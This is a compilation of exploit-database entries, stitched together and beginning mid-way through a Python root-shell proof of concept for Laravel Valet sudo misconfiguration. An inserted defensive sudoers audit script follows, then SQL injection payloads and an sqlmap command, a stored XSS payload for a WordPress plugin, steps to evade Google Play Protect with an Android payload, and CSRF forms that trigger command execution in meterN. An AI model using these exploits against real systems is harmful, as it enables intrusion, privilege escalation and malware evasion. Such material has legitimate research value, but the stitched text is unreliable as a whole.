/> with open(valet_command, 'w') as vc:<br /> vc.write(''.join(command_contents))<br /><br /> print('* Shell written. Dropping into root shell')<br /><br /> # drop in the root shell :D<br /> os.system('sudo ' + valet_command)<br /> cleanup_poc_from_command(valet_command)<br /><br /><br />if __name__ == '__main__':<br /> main()<br /> <br /></code></pre>
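The root cause in the advisory above is a NOPASSWD sudoers rule whose command path is a symlink into an unprivileged user's home directory. The following is an added example, not leonjza's or Laravel's code: it parses `Cmnd_Alias` and `NOPASSWD:` rules, then checks for each command whether the link itself or the resolved target is owned by a non-root user or is group/world writable. `build_fixture` creates a constructed temporary layout mirroring the advisory (bin/valet -> home/valet); the sudoers sample is copied from the advisory.

```python
"""Audit sudoers NOPASSWD rules whose command is a user-modifiable file or symlink."""
import os
import re
import stat
import tempfile

ALIAS_RE = re.compile(r"^\s*Cmnd_Alias\s+(\w+)\s*=\s*(.+)$")
RULE_RE = re.compile(
    r"^\s*(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?:\w+:\s*)*NOPASSWD:\s*(.+)$"
)


def parse_sudoers(text):
    """Return {rule description: [command paths]} for every NOPASSWD rule."""
    aliases, rules = {}, {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].rstrip()  # drop comments
        m = ALIAS_RE.match(line)
        if m:
            # "path *" -> path; wildcards do not change which file is executed
            aliases[m.group(1)] = [c.strip().split()[0] for c in m.group(2).split(",")]
            continue
        m = RULE_RE.match(line)
        if m:
            cmds = []
            for item in m.group(2).split(","):
                item = item.strip()
                if item in aliases:
                    cmds.extend(aliases[item])
                elif item:
                    cmds.append(item.split()[0])
            rules[f"{m.group(1)} NOPASSWD: {m.group(2).strip()}"] = cmds
    return rules


def path_risks(path, trusted_uids=(0,)):
    """Reasons the command at path could be changed without root."""
    risks = []
    try:
        link = os.lstat(path)
    except FileNotFoundError:
        return ["missing"]
    if stat.S_ISLNK(link.st_mode) and link.st_uid not in trusted_uids:
        risks.append(f"symlink owned by uid {link.st_uid}")  # owner can re-point it
    try:
        target = os.stat(path)  # follows the link
    except FileNotFoundError:
        return risks + ["dangling symlink"]
    if target.st_uid not in trusted_uids:
        risks.append(f"target owned by uid {target.st_uid}")
    if target.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        risks.append("target is group/world writable")
    return risks


def audit(text, trusted_uids=(0,)):
    """Map each risky command path to its rule and the reasons it was flagged."""
    findings = {}
    for rule, cmds in parse_sudoers(text).items():
        for cmd in cmds:
            risks = path_risks(cmd, trusted_uids)
            if risks:
                findings[cmd] = {"rule": rule, "risks": risks}
    return findings


# Copied from the advisory's /etc/sudoers.d/* listing.
SUDOERS_SAMPLE = """
Cmnd_Alias BREW = /usr/local/bin/brew *
%admin ALL=(root) NOPASSWD: BREW
Cmnd_Alias VALET = /usr/local/bin/valet *
%admin ALL=(root) NOPASSWD: VALET
"""


def build_fixture():
    """Constructed layout: bin/valet -> home/valet (group-writable), bin/brew (0755)."""
    root = tempfile.mkdtemp(prefix="sudoers_audit_")
    home, bindir = os.path.join(root, "home"), os.path.join(root, "bin")
    os.mkdir(home)
    os.mkdir(bindir)
    script = os.path.join(home, "valet")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\necho valet\n")
    os.chmod(script, 0o775)
    link = os.path.join(bindir, "valet")
    os.symlink(script, link)
    brew = os.path.join(bindir, "brew")
    with open(brew, "w") as fh:
        fh.write("#!/bin/sh\necho brew\n")
    os.chmod(brew, 0o755)
    text = (f"Cmnd_Alias BREW = {brew} *\n%admin ALL=(root) NOPASSWD: BREW\n"
            f"Cmnd_Alias VALET = {link} *\n%admin ALL=(root) NOPASSWD: VALET\n")
    return text, link, brew


if __name__ == "__main__":
    text, _, _ = build_fixture()
    for cmd, f in audit(text).items():
        print(f"{cmd}: {', '.join(f['risks'])}  ({f['rule']})")
```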
<pre><code># Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection<br /># Date: 11/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /><br /><br /># Vulnerable Code<br /><br />line 2 in file "mvogms/products/view_product.php"<br /><br />$qry = $conn->query("SELECT p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");<br /><br /># Sqlmap command:<br /><br />sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: page=products/view_product&id=3' AND 9973=9973-- ogag<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ<br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 29/11/2021<br /># Exploit Author: Mansi Singh<br /># Vendor Homepage: https://wordpress.org/plugins/typebot/<br /># Software Link: https://wordpress.org/plugins/typebot/<br /># Tested on Windows<br /># Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea<br /><br />How to reproduce vulnerability:<br /><br />1. Install Latest WordPress<br /><br />2. Install and activate Typebot Version 1.4.3<br /><br />3. Navigate to Typebot setting >> enter the payload into 'Publish ID or Full URL'.<br /><br />4. Enter JavaScript payload which is mentioned below<br />"><img src=x onerror=confirm(1)><br /><br />5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.<br /></code></pre>
<pre><code># Exploit Title: Google Play Protect 22.4.25 - Detection Bypass <br /># Date: 2022-02-14<br /># Exploit Author: Aryan Chehreghani<br /># Contact: aryanchehreghani@yahoo.com<br /># Vendor Homepage: https://play.google.com<br /># Version: 22.4.25 (Possibly all versions)<br /># Tested on: Android 5.1.1<br /><br /># [ About - Google Play Protect ]:<br /><br />#Google Play Protect is Google's built-in malware protection for Android,<br />#Backed by the strength of Google's machine learning algorithms, it is always improving in real time,<br />#Google Play Protect continuously works to keep your device, data and apps safe,<br />#It automatically scans your device and makes sure that you have the latest in mobile security, so you can rest easy,<br />#All Android apps undergo rigorous security testing before appearing in the Google Play Store,<br />#Play Protect scans billions of apps daily to make sure that everything remains spot on.<br /><br /># [ Steps ]:<br /><br /># 1.Build an Android Payload<br /># 2.Install the Payload ( The google play protect has detected the payload as unsafe ) <br /># 3.Clear the payload<br /># 4.Using the Android editor program, change the (Target Sdk to '39') <br /># 5.Install Payload again ( The google play protect will not be able to detect the Payload as unsafe )<br /><br /># [ PoC - Video ]: <br /><br />https://drive.google.com/file/d/1KiTalfk7b8VZPJVsCF_EoLsTQob5GVA7/view?usp=sharing<br /></code></pre>
<pre><code><!--<br /><br />meterN v1.2.3 Authenticated Remote Command Execution Vulnerability<br /><br /><br />Vendor: Jean-Marc Louviaux<br />Product web page: https://www.metern.org<br />Affected version: 1.2.3 and 0.8.3.2<br /><br /><br />Summary: meterN is a set of PHP/JS files that make a -Home energy metering & monitoring- solution.<br />It accepts any meters like: electrical, water, gas, fuel consumption, solar, Wind energy production<br />and so on. Sensors such as temperature or humidity are also accepted. The philosophy is: To keep it<br />simple, fast, with a low foot print to run on cheap and low powered devices.<br /><br />Desc: The application suffers from an authenticated OS command execution vulnerability. This can be<br />exploited to execute arbitrary commands through the 'COMMANDx' and 'LIVECOMMANDx' POST parameters in<br />admin_meter2.php and admin_indicator2.php scripts. The application interface allows users to perform<br />these actions through HTTP requests without performing any validity checks to verify the requests.<br />This CSRF can be exploited to perform actions with administrative privileges if a logged-in user<br />visits a malicious web site.<br /><br />---------------------------------------------------------------------------------------------------<br />/admin/admin_meter2.php:<br />------------------------<br /><br />69: if (!empty($_POST['COMMANDx']) && is_string($_POST['COMMANDx'])) {<br />70: $COMMANDx = htmlspecialchars($_POST['COMMANDx'], ENT_QUOTES, 'UTF-8');<br />71: } else {<br />72: $COMMANDx = '';<br />73: }<br />...<br />...<br />108: if (!empty($_POST['LIVECOMMANDx']) && is_string($_POST['LIVECOMMANDx'])) {<br />109: $LIVECOMMANDx = htmlspecialchars($_POST['LIVECOMMANDx'], ENT_QUOTES, 'UTF-8');<br />110: } else {<br />111: $LIVECOMMANDx = '';<br />112: }<br />...<br />...<br />271: exec("$COMMANDx 2>&1", $datareturn);<br />...<br />...<br />303: exec("$LIVECOMMANDx 2>&1", $datareturn);<br /><br 
/>---------------------------------------------------------------------------------------------------<br /><br />Tested on: Apache/2.4.10 (Raspbian)<br /> Apache/2.4.46 (Win64)<br /> Linux 4.9.67-v7+ GNU/Linux (armv7l)<br /> Microsoft Windows 10 Home (10.0.19042 Build 19042)<br /> PHP/7.2.33<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2021-5690<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5690.php<br /><br /><br />18.11.2021<br /><br />--><br /><br /><br />PoC #1:<br />-------<br /><br /><html><br /> <body><br /> <form action="http://localhost/metern/admin/admin_indicator2.php" method="POST"><br /> <input type="hidden" name="NUMINDx" value="1" /><br /> <input type="hidden" name="INDNAMEx1" value="test" /><br /> <input type="hidden" name="IDx1" value="1" /><br /> <input type="hidden" name="COMMANDx1" value="calc" /><br /> <input type="hidden" name="bntsubmit1" value="Test command" /><br /> <input type="hidden" name="UNITx1" value="" /><br /> <input type="submit" value="Incongruity" /><br /> </form><br /> </body><br /></html><br /><br /><br />PoC #2:<br />-------<br /><br /><html><br /> <body><br /> <form action="http://localhost/metern/admin/admin_meter2.php" method="POST"><br /> <input type="hidden" name="METNAMEx" value="Conso" /><br /> <input type="hidden" name="COLORx" value="962629" /><br /> <input type="hidden" name="TYPEx" value="Elect" /><br /> <input type="hidden" name="PRODx" value="2" /><br /> <input type="hidden" name="PHASEx" value="1" /><br /> <input type="hidden" name="SKIPMONITORINGx" value="" /><br /> <input type="hidden" name="IDx" value="elect" /><br /> <input type="hidden" name="COMMANDx" value="houseenergy -energy" /><br /> <input type="hidden" name="PASSOx" value="100000" /><br /> <input type="hidden" name="PRICEx" value="0.23" /><br /> <input type="hidden" name="LIDx" value="elect" /><br /> <input type="hidden" name="LIVECOMMANDx" 
value="calc" /><br /> <input type="hidden" name="bntsubmit" value="Test live command" /><br /> <input type="hidden" name="EMAILx" value="" /><br /> <input type="hidden" name="WARNCONSODx" value="15000" /><br /> <input type="hidden" name="NORESPMx" value="true" /><br /> <input type="hidden" name="POAKEYx" value="" /><br /> <input type="hidden" name="POUKEYx" value="" /><br /> <input type="hidden" name="TLGRTOKx" value="" /><br /> <input type="hidden" name="TLGRCIDx" value="" /><br /> <input type="hidden" name="met_numx" value="1" /><br /> <input type="submit" value="Incongruity" /><br /> </form><br /> </body><br /></html><br /></code></pre>